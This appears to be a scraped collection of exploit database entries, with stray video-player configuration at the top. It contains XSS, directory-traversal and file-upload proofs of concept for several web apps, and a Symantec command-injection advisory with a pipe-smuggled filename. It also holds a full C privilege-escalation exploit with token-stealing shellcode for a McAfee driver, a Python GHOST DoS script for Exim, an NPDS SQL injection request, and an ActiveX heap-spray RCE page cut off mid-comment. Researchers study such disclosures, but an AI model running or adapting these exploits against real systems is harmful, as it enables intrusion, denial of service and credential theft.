%22,%22volumeBarHeightRatio%22:0.2,%22opacity%22:1,%22timeFontSize%22:12,%22left%22:%2250pct%22,%22tooltipColor%22:%22rgba%280,%200,%200,%200%29%22,%22bufferColor%22:%22#a3a3a3%22,%22volumeSliderColor%22:%22#ffffff%22,%22border%22:%220px%22,%22buttonColor%22:%22#ffffff%22,%22durationColor%22:%22#b8d9ff%22,%22autoHide%22:{%22enabled%22:true,%22hideDelay%22:500,%22hideStyle%22:%22fade%22,%22mouseOutDelay%22:500,%22hideDuration%22:400,%22fullscreenOnly%22:true},%22backgroundGradient%22:%22none%22,%22width%22:%22100pct%22,%22sliderBorder%22:%221px%20solid%20rgba%28128,%20128,%20128,%200.7%29%22,%22display%22:%22block%22,%22buttonOverColor%22:%22#ffffff%22,%22url%22:%22flowplayer.controls-3.2.5.swf%22,%22timeBorder%22:%220px%20solid%20rgba%280,%200,%200,%200.3%29%22,%22progressColor%22:%22#4599ff%22,%22timeBgColor%22:%22rgb%280,%200,%200,%200%29%22,%22scrubberBarHeightRatio%22:0.2,%22bottom%22:0,%22builtIn%22:false,%22volumeBorder%22:%221px%20solid%20rgba%28128,%20128,%20128,%200.7%29%22,%22margins%22:[2,12,2,12]}}}
source: https://www.securityfocus.com/bid/48669/info
TCExam is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
TCExam 11.2.009, 11.2.010 and 11.2.011 are vulnerable; other versions may also be affected.
XSS: GET http://www.example.com/tcexam/admin/code/{script}.php?{parameter}={value}"><script>alert(1)</script>
XSS: POST http://www.example.com/tcexam/admin/code/{script}.php HTTP/1.0
- {parameter}={value}<script>alert(1)</script>&{parameter}={value}
XSS URI: GET http://www.example.com/tcexam/admin/code/index.php?zsl=>"><script>alert(1)</script>
XSS Path: GET http://www.example.com/tcexam/admin/code/?=>"'><script>alert(1)</script>
source: https://www.securityfocus.com/bid/48672/info
Chyrp is prone to multiple cross-site scripting vulnerabilities, a local file-include vulnerability, an arbitrary file-upload vulnerability, and a directory-traversal vulnerability.
An attacker may leverage these issues to execute arbitrary script code on an affected computer and in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, open or run arbitrary files in the context of the webserver process, and gain access to sensitive information.
Chyrp 2.1 is vulnerable; other versions may also be affected.
http://www.example.com/admin/help.php?title=[XSS]&body=[XSS]
source: https://www.securityfocus.com/bid/48672/info
Chyrp is prone to multiple cross-site scripting vulnerabilities, a local file-include vulnerability, an arbitrary file-upload vulnerability, and a directory-traversal vulnerability.
An attacker may leverage these issues to execute arbitrary script code on an affected computer and in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, open or run arbitrary files in the context of the webserver process, and gain access to sensitive information.
Chyrp 2.1 is vulnerable; other versions may also be affected.
http://www.example.com/?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpassword%00
Vantage Point Security Advisory 2014-007
========================================
Title: Symantec Encryption Management Server - Remote Command Injection
ID: VP-2014-007
Vendor: Symantec
Affected Product: Symantec Encryption Gateway
Affected Versions: < 3.2.0 MP6
Product Website: http://www.symantec.com/en/sg/gateway-email-encryption/
Author: Paul Craig <paul[at]vantagepoint[dot]sg
Summary:
---------
Symantec Gateway Email Encryption provides centrally managed email encryption
to secure email communications with customers and partners regardless of whether
or not recipients have their own email encryption software.
With Gateway Email Encryption, organizations can minimize the risk of
a data breach while complying with regulatory mandates for information
security and privacy.
Details:
---------
Remote Command Injection vulnerabilities occur when user supplied
input is used directly as a command line argument to a fork(), execv()
or a CreateProcessA() function.
It was found that the binary /usr/bin/pgpsysconf calls the binary
/usr/bin/pgpbackup with unfiltered user supplied input when restoring
a Database Backup from the Symantec Encryption Management Web
Interface .
The user supplied 'filename' value is used directly as a command
argument, and can be concatenated to include additional commands with
the use of the pipe character.
This can allow a lower privileged Administrator to compromise the
Encryption Management Server.
This is demonstrated below in a snippet from pgpsysconf;
.text:08058FEA mov dword ptr [ebx], offset
aUsrBinPgpbacku ; "/usr/bin/pgpbackup"
.text:08058FF0 cmp [ebp+var_1D], 0
.text:08058FF4 jnz short loc_8059049
.text:08058FF6 mov ecx, 4
.text:08058FFB mov edx, 8
.text:08059000 mov eax, 0Ch
.text:08059005 mov dword ptr [ebx+ecx], offset unk_807AE50
.text:0805900C mov [ebx+edx], esi
.text:0805900F mov dword ptr [ebx+eax], 0
.text:08059016 call _fork ; Bingo..
An example to exploit this vulnerability and run the ping command can
be seen below.
POST /omc/uploadBackup.event ....
....
Content-Disposition: form-data; name="file";
filename="test123|`ping`|-whatever.tar.gz.pgp"
This vulnerability can be further exploited to gain local root access
by calling the setuid binary pgpsysconf to install a local package
file.
Fix Information:
---------
Upgrade to Symantec Encryption Management Server 3.3.2 MP7.
See http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20150129_00
for more information
Timeline:
---------
2014/11/26: Issue Reported.
2015/01/30: Patch Released.
About Vantage Point Security:
---------
Vantage Point Security is the leading provider for penetration testing
and security advisory services in Singapore. Clients in the Financial,
Banking and Telecommunications industries select Vantage Point
Security based on technical competency and a proven track record to
deliver significant and measurable improvements in their security
posture.
Web: https://www.vantagepoint.sg/
Contact: office[at]vantagepoint[dot]sg
/*
Exploit Title - McAfee Data Loss Prevention Endpoint Arbitrary Write Privilege Escalation
Date - 29th January 2015
Discovered by - Parvez Anwar (@parvezghh)
Vendor Homepage - http://www.mcafee.com
Tested Version - 9.3.200.23
Driver Version - 9.3.200.23 - hdlpctrl.sys
Tested on OS - 32bit Windows XP SP3 and Windows 2003 Server SP2
OSVDB - http://www.osvdb.org/show/osvdb/117345
CVE ID - CVE-2015-1305
Vendor fix url - https://kc.mcafee.com/corporate/index?page=content&id=SB10097
Fixed version - 9.3.400
Fixed driver ver -
*/
#include <stdio.h>
#include <windows.h>
#define BUFSIZE 4096
typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {
PVOID Unknown1;
PVOID Unknown2;
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT NameLength;
USHORT LoadCount;
USHORT PathLength;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
typedef struct _SYSTEM_MODULE_INFORMATION {
ULONG Count;
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
typedef enum _SYSTEM_INFORMATION_CLASS {
SystemModuleInformation = 11,
SystemHandleInformation = 16
} SYSTEM_INFORMATION_CLASS;
typedef NTSTATUS (WINAPI *_NtQuerySystemInformation)(
SYSTEM_INFORMATION_CLASS SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength);
typedef NTSTATUS (WINAPI *_NtQueryIntervalProfile)(
DWORD ProfileSource,
PULONG Interval);
typedef void (*FUNCTPTR)();
// Windows XP SP3
#define XP_KPROCESS 0x44 // Offset to _KPROCESS from a _ETHREAD struct
#define XP_TOKEN 0xc8 // Offset to TOKEN from the _EPROCESS struct
#define XP_UPID 0x84 // Offset to UniqueProcessId FROM the _EPROCESS struct
#define XP_APLINKS 0x88 // Offset to ActiveProcessLinks _EPROCESS struct
// Windows Server 2003
#define W2K3_KPROCESS 0x38 // Offset to _KPROCESS from a _ETHREAD struct
#define W2K3_TOKEN 0xd8 // Offset to TOKEN from the _EPROCESS struct
#define W2K3_UPID 0x94 // Offset to UniqueProcessId FROM the _EPROCESS struct
#define W2K3_APLINKS 0x98 // Offset to ActiveProcessLinks _EPROCESS struct
BYTE token_steal_xp[] =
{
0x52, // push edx Save edx on the stack
0x53, // push ebx Save ebx on the stack
0x33,0xc0, // xor eax, eax eax = 0
0x64,0x8b,0x80,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD
0x8b,0x40,XP_KPROCESS, // mov eax, [eax+XP_KPROCESS] Retrieve _KPROCESS
0x8b,0xc8, // mov ecx, eax
0x8b,0x98,XP_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+XP_TOKEN] Retrieves TOKEN
0x8b,0x80,XP_APLINKS,0x00,0x00,0x00, // mov eax, [eax+XP_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks
0x81,0xe8,XP_APLINKS,0x00,0x00,0x00, // sub eax, XP_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks
0x81,0xb8,XP_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // cmp [eax+XP_UPID], 4 | Compares UniqueProcessId with 4 (System Process)
0x75,0xe8, // jne ----
0x8b,0x90,XP_TOKEN,0x00,0x00,0x00, // mov edx, [eax+XP_TOKEN] Retrieves TOKEN and stores on EDX
0x8b,0xc1, // mov eax, ecx Retrieves KPROCESS stored on ECX
0x89,0x90,XP_TOKEN,0x00,0x00,0x00, // mov [eax+XP_TOKEN], edx Overwrites the TOKEN for the current KPROCESS
0x5b, // pop ebx Restores ebx
0x5a, // pop edx Restores edx
0xc2,0x08 // ret 8
};
BYTE token_steal_w2k3[] =
{
0x52, // push edx Save edx on the stack
0x53, // push ebx Save ebx on the stack
0x33,0xc0, // xor eax, eax eax = 0
0x64,0x8b,0x80,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD
0x8b,0x40,W2K3_KPROCESS, // mov eax, [eax+W2K3_KPROCESS] Retrieve _KPROCESS
0x8b,0xc8, // mov ecx, eax
0x8b,0x98,W2K3_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+W2K3_TOKEN] Retrieves TOKEN
0x8b,0x80,W2K3_APLINKS,0x00,0x00,0x00, // mov eax, [eax+W2K3_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks
0x81,0xe8,W2K3_APLINKS,0x00,0x00,0x00, // sub eax, W2K3_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks
0x81,0xb8,W2K3_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00,// cmp [eax+W2K3_UPID], 4 | Compares UniqueProcessId with 4 (System Process)
0x75,0xe8, // jne ----
0x8b,0x90,W2K3_TOKEN,0x00,0x00,0x00, // mov edx, [eax+W2K3_TOKEN] Retrieves TOKEN and stores on EDX
0x8b,0xc1, // mov eax, ecx Retrieves KPROCESS stored on ECX
0x89,0x90,W2K3_TOKEN,0x00,0x00,0x00, // mov [eax+W2K3_TOKEN], edx Overwrites the TOKEN for the current KPROCESS
0x5b, // pop ebx Restores ebx
0x5a, // pop edx Restores edx
0xc2,0x08 // ret 8 Away from the kernel
};
DWORD HalDispatchTableAddress()
{
_NtQuerySystemInformation NtQuerySystemInformation;
PSYSTEM_MODULE_INFORMATION pModuleInfo;
DWORD HalDispatchTable;
CHAR kFullName[256];
PVOID kBase = NULL;
LPSTR kName;
HMODULE Kernel;
FUNCTPTR Hal;
ULONG len;
NTSTATUS status;
NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation");
if (!NtQuerySystemInformation)
{
printf("[-] Unable to resolve NtQuerySystemInformation\n\n");
return -1;
}
status = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len);
if (!status)
{
printf("[-] An error occured while reading NtQuerySystemInformation. Status = 0x%08x\n\n", status);
return -1;
}
pModuleInfo = (PSYSTEM_MODULE_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len);
if(pModuleInfo == NULL)
{
printf("[-] An error occurred with GlobalAlloc for pModuleInfo\n\n");
return -1;
}
status = NtQuerySystemInformation(SystemModuleInformation, pModuleInfo, len, &len);
memset(kFullName, 0x00, sizeof(kFullName));
strcpy_s(kFullName, sizeof(kFullName)-1, pModuleInfo->Module[0].ImageName);
kBase = pModuleInfo->Module[0].Base;
printf("[i] Kernel base name %s\n", kFullName);
kName = strrchr(kFullName, '\\');
Kernel = LoadLibraryA(++kName);
if(Kernel == NULL)
{
printf("[-] Failed to load kernel base\n\n");
return -1;
}
Hal = (FUNCTPTR)GetProcAddress(Kernel, "HalDispatchTable");
if(Hal == NULL)
{
printf("[-] Failed to find HalDispatchTable\n\n");
return -1;
}
printf("[i] HalDispatchTable address 0x%08x\n", Hal);
printf("[i] Kernel handle 0x%08x\n", Kernel);
printf("[i] Kernel base address 0x%08x\n", kBase);
HalDispatchTable = ((DWORD)Hal - (DWORD)Kernel + (DWORD)kBase);
printf("[+] Kernel address of HalDispatchTable 0x%08x\n", HalDispatchTable);
if(!HalDispatchTable)
{
printf("[-] Failed to calculate HalDispatchTable\n\n");
return -1;
}
return HalDispatchTable;
}
int GetWindowsVersion()
{
int v = 0;
DWORD version = 0, minVersion = 0, majVersion = 0;
version = GetVersion();
minVersion = (DWORD)(HIBYTE(LOWORD(version)));
majVersion = (DWORD)(LOBYTE(LOWORD(version)));
if (minVersion == 1 && majVersion == 5) v = 1; // "Windows XP;
if (minVersion == 1 && majVersion == 6) v = 2; // "Windows 7";
if (minVersion == 2 && majVersion == 5) v = 3; // "Windows Server 2003;
return v;
}
void spawnShell()
{
STARTUPINFOA si;
PROCESS_INFORMATION pi;
ZeroMemory(&pi, sizeof(pi));
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
si.cb = sizeof(si);
si.dwFlags = STARTF_USESHOWWINDOW;
si.wShowWindow = SW_SHOWNORMAL;
if (!CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi))
{
printf("\n[-] CreateProcess failed (%d)\n\n", GetLastError());
return;
}
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
}
int main(int argc, char *argv[])
{
_NtQueryIntervalProfile NtQueryIntervalProfile;
LPVOID input[1] = {0};
LPVOID addrtoshell;
HANDLE hDevice;
DWORD dwRetBytes = 0;
DWORD HalDispatchTableTarget;
ULONG time = 0;
unsigned char devhandle[MAX_PATH];
printf("-------------------------------------------------------------------------------\n");
printf("McAfee Data Loss Prevention Endpoint (hdlpctrl.sys) Arbitrary Write EoP Exploit\n");
printf(" Tested on Windows XP SP3/Windows Server 2003 SP2 (32bit) \n");
printf("-------------------------------------------------------------------------------\n\n");
if (GetWindowsVersion() == 1)
{
printf("[i] Running Windows XP\n");
}
if (GetWindowsVersion() == 3)
{
printf("[i] Running Windows Server 2003\n");
}
if (GetWindowsVersion() == 0)
{
printf("[i] Exploit not supported on this OS\n\n");
return -1;
}
sprintf(devhandle, "\\\\.\\%s", "devbkctrl");
NtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryIntervalProfile");
if (!NtQueryIntervalProfile)
{
printf("[-] Unable to resolve NtQueryIntervalProfile\n\n");
return -1;
}
addrtoshell = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if(addrtoshell == NULL)
{
printf("[-] VirtualAlloc allocation failure %.8x\n\n", GetLastError());
return -1;
}
printf("[+] VirtualAlloc allocated memory at 0x%.8x\n", addrtoshell);
memset(addrtoshell, 0x90, BUFSIZE);
if (GetWindowsVersion() == 1)
{
memcpy(addrtoshell, token_steal_xp, sizeof(token_steal_xp));
printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_xp));
}
if (GetWindowsVersion() == 3)
{
memcpy(addrtoshell, token_steal_w2k3, sizeof(token_steal_w2k3));
printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_w2k3));
}
hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
if (hDevice == INVALID_HANDLE_VALUE)
{
printf("[-] CreateFile open %s device failed (%d)\n\n", devhandle, GetLastError());
return -1;
}
else
{
printf("[+] Open %s device successful\n", devhandle);
}
HalDispatchTableTarget = HalDispatchTableAddress() + sizeof(DWORD);
printf("[+] HalDispatchTable+4 (0x%08x) will be overwritten\n", HalDispatchTableTarget);
input[0] = addrtoshell; // input buffer contents gets written to our output buffer address
printf("[+] Input buffer contents %08x\n", input[0]);
printf("[~] Press any key to send Exploit . . .\n");
getch();
DeviceIoControl(hDevice, 0x00224014, input, sizeof(input), (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL);
printf("[+] Buffer sent\n");
CloseHandle(hDevice);
printf("[+] Spawning SYSTEM Shell\n");
NtQueryIntervalProfile(2, &time);
spawnShell();
return 0;
}
# Exploit Title: [Exim ESMTP GHOST DoS PoC Exploit]
# Date: [1/29/2015]
# Exploit Author: [1N3]
# Vendor Homepage: [www.exim.org]
# Version: [4.80 or less]
# Tested on: [debian-7-7-64b]
# CVE : [2015-0235]
#!/usr/bin/python
# Exim ESMTP DoS Exploit by 1N3 v20150128
# CVE-2015-0235 GHOST glibc gethostbyname buffer overflow
# http://crowdshield.com
#
# USAGE: python ghost-smtp-dos.py <ip> <port>
#
# Escape character is '^]'.
# 220 debian-7-7-64b ESMTP Exim 4.80 ...
# HELO
# 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
# Connection closed by foreign host.
#
# user () debian-7-7-64b:~$ dmesg
# ...
# [ 1715.842547] exim4[2562]: segfault at 7fabf1f0ecb8 ip 00007fabef31bd04 sp 00007fffb427d5b0 error 6 in
# libc-2.13.so[7fabef2a2000+182000]
import socket
import time
import sys, getopt
def main(argv):
argc = len(argv)
if argc <= 1:
print "usage: %s <host>" % (argv[0])
sys.exit(0)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
target = argv[1] # SET TARGET
port = argv[2] # SET PORT
print "(--==== Exim ESMTP DoS Exploit by 1N3 - https://crowdshield.com"
print "(--==== Sending GHOST SMTP DoS to " + target + ":" + port + " with length:" +str(len(buffer))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((target,int(port)))
data = s.recv(1024)
print "CONNECTION: " +data
s.send('HELO ' + buffer + '\r\n')
data = s.recv(1024)
print "received: " +data
s.send('EHLO ' + buffer + '\r\n')
data = s.recv(1024)
print "received: " +data
s.close()
main(sys.argv)
Title - NPDS CMS Revolution-13 - SQL Injection Vulnerability
Credits & Author:
Narendra Bhati ( R00t Sh3ll )
www.websecgeeks.com
References (Source):
====================
http://www.npds.org/viewtopic.php?topic=26233&forum=12
http://websecgeeks.com/npds-cms-sql-injection/
Release Date:
=============
24-01-2015
CVE ID :
====================================
CVE-2015-1400
Product & Service Introduction:
===============================
http://www.npds.org/
Abstract Advisory Information:
==============================
Narendra Bhati ( R00t Sh3ll ) An Information Security Analyst In Pune ( India ) discovered a remote sql injection vulnerability in the NPDS CMS .
Vulnerability Disclosure Timeline:
==================================
25-01-2015 : Public Disclosure
Timeline Status:
=================
Reported To Vendor 14-12-2014
Verified By Vendor 15-12-2014
Acknowledge By Vendor 14-01-2015
Public Disclosure By Vendor 24-01-2015
Technical Disclosure 25-01-2015
Vendor Security Advisory http://www.npds.org/viewtopic.php?topic=26233&forum=12
Technical Disclosure - http://websecgeeks.com/npds-cms-sql-injection/
CVE-2015-1400
Mitigation For This Vulnerability There Is No Update By Vendor , But That Will Be Out Soon !
Affected Product(s):
====================
NPDS-Revolution-13
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A sql injection web vulnerability has been discovered in the NPDS CMS - NPDS-Revolution-13.
The vulnerability allows an attacker to inject sql commands by usage of a vulnerable value to compromise the application dbms.
The sql injection vulnerability is located in the `query` parameter of the vulnerable `search.php ` application file. Remote attackers
are able to inject own sql commands by usage of vulnerable `search.php ` file. A successful attack requires to
manipulate a POST method request with vulnerable parameter `query` value to inject own sql commands. The injection is a time based ( tested ) by sql injection
that allows to compromise the web-application and connected dbms.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] NPDS-Revolution-13
Vulnerable File(s):
[+] search.php
Vulnerable Parameter(s):
[+] query
Proof of Concept (PoC):
=======================
The remote sql injection web vulnerability can be exploited by remote attackers without privileged application user account.
For reproduce the security vulnerability follow the provided information and steps below to continue.
HTTP Request
##### ==========
POST /npds/search.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/npds/index.php?op=edito
Cookie: cookievalue
Connection: keep-alive
content-type:! application/x-www-form-urlencoded
Content-Length: 63
query=")and benchmark(20000000,sha1(1))-
====================================
Reference(s):
http://www.npds.org/viewtopic.php?topic=26233&forum=12
http://websecgeeks.com/npds-cms-sql-injection/
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerability `query` parameter value in the search.php file.
Use a prepared statement to fix the issues fully and setup own exception that prevents sql injection attacks.
Security Risk:
==============
The security risk of the remote sql injection web vulnerability as critical
Credits & Author:
==================
Narendra Bhati ( R00t Sh3ll )
www.websecgeeks.com
source: https://www.securityfocus.com/bid/48672/info
Chyrp is prone to multiple cross-site scripting vulnerabilities, a local file-include vulnerability, an arbitrary file-upload vulnerability, and a directory-traversal vulnerability.
An attacker may leverage these issues to execute arbitrary script code on an affected computer and in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, open or run arbitrary files in the context of the webserver process, and gain access to sensitive information.
Chyrp 2.1 is vulnerable; other versions may also be affected.
C:
Appended ;*.php in script for the add photo feather (http://www.example.com/admin/?action=write_post&feather=photo) using intercepting proxy
<script type="text/javascript">
$(function(){
$("#photo").clone().attr("id", "photo_fake").addClass("swfupload_button").insertBefore("#photo")
photo = new SWFUpload({
upload_url : "http://www.example.com/chyrp_v2.0/modules/swfupload/upload_handler.php",
flash_url : "http://www.example.com/chyrp_v2.0/modules/swfupload/lib/swfupload.swf",
post_params: {"PHPSESSID" : "5o3bnghnijk4hlr7vnshi3vb76", "PHPSESSNAME" : "ChyrpSession", "ajax" : "true" },
file_size_limit : "100 MB",
file_types : "*.jpg;*.jpeg;*.png;*.gif;*.bmp;*.php", <-- #MODIFY!
file_types_description : "All Files",
file_queue_error_handler : fileQueueError,
file_dialog_complete_handler : fileDialogComplete,
upload_start_handler : uploadStart,
upload_progress_handler : uploadProgress,
upload_error_handler : uploadError,
upload_success_handler : uploadSuccess,
button_placeholder_id : "photo",
button_width : $("#photo_fake").width(),
button_height : $("#photo_fake").height(),
button_action : SWFUpload.BUTTON_ACTION.SELECT_FILES,
upload_complete_handler : uploadComplete
})
$("#SWFUpload_0")
.css({ position: "absolute", top: $("#photo_fake").offset().top, left: $("#photo_fake").offset().left })
.before('<div id="progress"><div class="back"><div class="fill"></div><div class="clear"></div></div></div>')
})
</script>
source: https://www.securityfocus.com/bid/48672/info
Chyrp is prone to multiple cross-site scripting vulnerabilities, a local file-include vulnerability, an arbitrary file-upload vulnerability, and a directory-traversal vulnerability.
An attacker may leverage these issues to execute arbitrary script code on an affected computer and in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, open or run arbitrary files in the context of the webserver process, and gain access to sensitive information.
Chyrp 2.1 is vulnerable; other versions may also be affected.
http://www.example.com/includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd
source: https://www.securityfocus.com/bid/48714/info
The bSuite plug-in for WordPress is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
Attacker-supplied HTML and script code could be executed in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks may also be possible.
bSuite versions 4.0.7 and prior are vulnerable.
The following example URIs are available:
http://www.example.com/wordpress/?s=<h2>XSSED</h2>
http://www.example.com/wordpress/?p=1&<h1>XSSED</h1>
<!DOCTYPE HTML>
<!--
###############################################################################
*
* Exploit Title: X360 VideoPlayer ActiveX Control RCE Full ASLR & DEP Bypass
* Author: Rh0
* Date: Jan 30 2015
* Affected Software: X360 VideoPlayer ActiveX Control 2.6 (VideoPlayer.ocx)
* Vulnerability: Buffer Overflow in Data Section
* Tested on: Internet Explorer 10 32-bit (Windows 7 64-bit in VirtualBox)
* Software Links:
http://www.x360soft.com/demo/videoplayersetup.exe
http://download.cnet.com/X360-Video-Player-ActiveX-Control/3000-2170_4-10581185.html
* Detailed writeup: https://rh0dev.github.io/blog/2015/fun-with-info-leaks/
*
###############################################################################
* Information about VideoPlayer.ocx *
###################################
md5sum: f9f2d32ae0e4d7b5c19692d0753451fb
Class VideoPlayer
GUID: {4B3476C6-185A-4D19-BB09-718B565FA67B}
Number of Interfaces: 1
Default Interface: _DVideoPlayer
RegKey Safe for Script: True
RegkeySafe for Init: True
KillBitSet: False
* NOTES *
#########
*) When passing an overlong string to the ActiveX object's "SetText" method, a
buffer overflow in the data section occurs. It allows overwriting a subsequent
pointer that can be used in a controlled memcpy when dispatching the object's
"SetFontName" method. With this arbitrary write, array structures can be
manipulated to gain access to complete process memory. Equipped with this
capability, necessary information can be leaked and manipulated to execute
arbitrary code remotely.
*) Comment in the alert messages to see some leaks ;)
*) This is PoC Code: If it does not work for you, clear IE's history and try
again. Tested against mshtml.dll and jscript9.dll version 10.0.9200.17183
*) Inspired by:
"http://blog.exodusintel.com/2013/12/09/a-browser-is-only-as-strong-as-its-weakest-byte-part-2/"
"http://ifsec.blogspot.de/2013/11/exploiting-internet-explorer-11-64-bit.html"
"https://cansecwest.com/slides/2014/The Art of Leaks - read version - Yoyo.pdf"
"https://cansecwest.com/slides/2014/ROPs_are_for_the_99_CanSecWest_2014.pdf"
"https://github.com/exp-sky/HitCon-2014-IE-11-0day-Windows-8.1-Exploit/blob/master/IE 11 0day & Windows 8.1 Exploit.pdf"
-->
<html>
<body>
<button onclick=run()>runme</button>
<script>
function run(){
/* VideoPlayer.ocx image has the rebase flag set =>
It's mapped to another base per process run */
/* create its vulnerable ActiveX object (as HTMLObjectElement) */
var obj = document.createElement("object");
obj.setAttribute("classid", "clsid:4B3476C6-185A-4D19-BB09-718B565FA67B");
/* amount of arrays to create on the heap */
nrArrays = 0x1000
/* size of data in one array block: 0xefe0 bytes =>
subract array header (0x20) and space for typed array headers (0x1000)
from 0x10000 */
arrSize = (0x10000-0x20-0x1000)/4
/* heap array container will hold our heap sprayed data */
arr = new Array(nrArrays)
/* use one buffer for all typed arrays */
intArrBuf = new ArrayBuffer(4)
/* spray the heap with array data blocks and subsequent typed array headers
of type Uint32Array */
k = 0
while(k < nrArrays){
/* create "jscript9!Js::JavascriptArray" with blocksize 0xf000 (data
aligned at 0xXXXX0020) */
arr[k] = new Array(arrSize);
/* fill remaining page (0x1000) after array data with headers of
"jscript9!Js::TypedArray<unsigned int>" (0x55 * 0x30 = 0xff0) as a
typed array header has the size of 0x30. 0x10 bytes are left empty */
for(var i= 0; i<0x55; i++){
/* headers become aligned @ 0xXXXXf000, 0xXXXXf030, 0xXXXXf060,.. */
arr[k][i] = new Uint32Array(intArrBuf, 0, 1);
}
/* tag the array's last element */
arr[k][arrSize - 1] = 0x12121212
k += 1;
}
/* perform controlled memwrite to 0x1111f010: typed array header is at
0x1111f000 to 0x1111f030 => overwrite array data header @ 11111f010 with
0x00000001 0x00000004 0x00000040 0x1111f030 0x00
The first 3 dwords are sideeffects due to the code we abuse for the
controlled memcpy */
addr = 0x1111f010 // WHERE TO WRITE
/* prepare buffer with address we want to write to */
ptrBuf = ""
/* fill buffer: length = relative pointer address - buffer start + pointer
offset */
while (ptrBuf.length < (0x92068 - 0x916a8 + 0xC)){ptrBuf += "A"}
ptrBuf += dword2str(addr)
/* trigger: overflow buffer and overwrite the pointer value after buffer */
obj.SetText(ptrBuf,0,0)
//alert("buffer overflown => check PTR @ videop_1+92068: dc videop_1+92068")
/* use overwritten pointer after buffer with method "SetFontName" to conduct
memory write. We overwrite a typed array's header length to 0x40 and let
